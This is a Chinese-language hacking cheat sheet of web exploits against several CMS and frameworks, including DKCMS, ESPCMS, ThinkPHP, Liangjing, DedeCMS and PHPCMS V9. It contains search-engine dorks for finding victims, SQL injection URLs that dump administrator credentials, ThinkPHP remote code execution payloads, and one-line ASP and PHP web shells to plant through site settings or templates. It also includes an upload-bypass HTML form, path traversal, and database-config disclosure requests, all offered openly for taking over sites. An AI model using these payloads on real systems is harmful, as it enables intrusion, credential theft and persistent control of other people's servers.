V3.1   _data/___dkcms_30_free.mdb

V4.2   _data/I^(()UU()H.mdb

默認後臺：admin

編輯器：admin/fckeditor

因而可知，官方安全意識挺差的，至於後臺拿shell，fck編輯器突破可拿shell

創建asp文件夾

Fck的路徑：Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp

=============================================================================================================================================================

【 ESPCMS通殺0day 】

百度關鍵字：inurl:index.php?ac=article&at=read&did=

默認後臺：adminsoft/index.php

注入點(爆表前綴)：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆賬號：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆密碼：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

賬號和密碼一次性爆：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

進到後臺後，直接點擊分類圖片-修改-選擇文件-直接上傳php一句話木馬

PS：當上傳不了php木馬時，去系統設置一下，添加圖片上傳格式 |php ，這樣就能夠上傳一個圖片文件頭的php木馬。

=============================================================================================================================================================

【 Thinkphp框架任意代碼執行漏洞 】

ThinkPHP是一款國內使用比較普遍的老牌PHP MVC框架，官方已經發布修復漏洞的補丁，地址： http://thinkphp.cn/down-116.html

關鍵字：thinkphp intitle:系統發生錯誤

獲取Thinkphp的版本號：index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D

獲取服務器的配置信息：index.php/module/aciton/param1/${@phpinfo()}

列出網站全部文件列表：index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

直接在網頁執行一句話：index.php/module/action/param1/{${eval($_POST[s])}}

菜刀鏈接： http://www.xxx.com/index.php/module/action/param1/{${eval($_POST[s])}}   密碼：s

=============================================================================================================================================================

【 良精系統 】

( 爆管理員賬號密碼的代碼 )

NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20」=’

（ 一句話木馬的妙用 ）

插入一句話木馬後，鏈接網站的配置文件：inc/config.asp 密碼都是g

1.網站配置-容許的上傳文件類型-插入閉合的一句話木馬：」%><%eval request(「g」)%><%s=」  不行就增長一個cer格式，以後上傳cer格式的木馬便可

2.網站配置-網站地址-插入閉合的一句話木馬：http://」%><%execute(request(「g」))%><%’

3.網站配置-網站名稱-插入閉合的一句話木馬：滄州臨港彩越化工有限公司」%><%eval request(「g」)%><%s=」

4.網站配置-版權信息-插入閉合的一句話木馬：」%><%eval(request(chr(103)))%><%’

5.本方法適用於access數據庫，只要在access數據庫任何地方插入：┼攠數畣整爠煥敵瑳∨≡┩> 再將mdb備份成asp或者asa，訪問這個asp或asa，就是一句話木馬。

 

（ 利用upfile_other.asp漏洞拿shell ）

直接訪問會員中心：userreg.asp

註冊一個用戶並在未退出登陸的狀態下，使用雙文件上傳工具足以爆它菊花，如下代碼保存爲1.html，並裏面的修改目標站，第一個上傳jpg，第二個上傳cer

<HTML><HEAD> <META http-equiv=Content-Type content=」text/html; charset=gb2312″> <STYLE type=text/css>BODY { FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee } .tx1 { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px } </STYLE>
<META content=」MSHTML 6.00.2800.1400″ name=GENERATOR></HEAD> <BODY leftMargin=0 topMargin=0> <FORM name=form1 action=」 http://www.xxx.com/upfile_other.asp「; method=post encType=multipart/form-data><INPUT type=file size=30 name=FileName> <INPUT type=file size=30 name=FileName1> <INPUT style=」BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal」 type=submit value=上傳 name=Submit> <INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>

另外能夠利用會員中心的cookies，用火狐瀏覽器登錄以後，訪問upfile_other.asp頁面，用抓包工具去抓包，接着用明小子上傳拿shell.

 

（ 上傳漏洞 ）

漏洞文件：Upfile_Photo.asp

前提是進入後臺了，訪問這個文件，將提示「請先選擇你要上傳的文件！」，用抓包工具抓管理員的cookies，再把上傳地址跟cookies扔到名小子裏上傳拿shell

 

（ 南方在線編輯器 ）

默認後臺：admin/Southidceditor/admin_style.asp

數據庫路徑：admin/SouthidcEditor\Datas\SouthidcEditor.mdb

遍歷目錄：admin/Southidceditor/admin_uploadfile.asp?id=14&dir=../..

文件上傳頁面：admin/Southidceditor/ewebeditor.asp?id=57&style=southidc

樣式設置頁面：admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47

=============================================================================================================================================================

【 dedecms最新注入漏洞及找後臺技巧 】

訪問這個：plus/search.php?keyword=as&typeArr[ uNion ]=a

看結果若是提示：Safe Alert: Request Error step 1 !

 

那麼直接用下面的exp爆出全部管理員的賬號密碼：
plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

看結果若是提示：Safe Alert: Request Error step 2 !

那麼直接用下面的exp爆出全部管理員的賬號密碼：  a198654
plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

有些/plus/目錄換成了/plugins/目錄，這時就要把/plus/換成/plugins/進行注射了

破解出md5爲20位結果，只須要把前三位和後一位去掉，剩餘16位拿去解密便可

如何找後臺？

默認後臺：dede

第一種方法：data/mysql_error_trace.inc （有時能夠爆出路徑）

第二種方法：把域名做爲後臺去嘗試

第三種方法：查看這個文件：robots.txt

第四種方法：ping下域名得到ip以後， http://www.bing.com/ 搜索：ip:127.0.0.1 php （可能得到後臺也能夠得到其餘旁註站，通常dede的旁站不少也是dedecms的）

=============================================================================================================================================================

【 PHPcms V9 爆數據庫信息漏洞】

直接爆出數據庫鏈接信息：/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

關於後臺拿webshell：進入後臺後點擊界面–模版風格–隨便找個頁面點擊修改，插入咱們的一句話代碼

<?

 

$fp = @fopen(「0day.php」, ‘a’);

@fwrite($fp, ‘<’.'?php’.」\r\n\r\n」.’eval($_POST[0day])’.」\r\n\r\n?」.」>\r\n」);

點擊保存，接着點擊可視化，代碼就成功執行了，接着菜刀鏈接/0day.php，密碼0day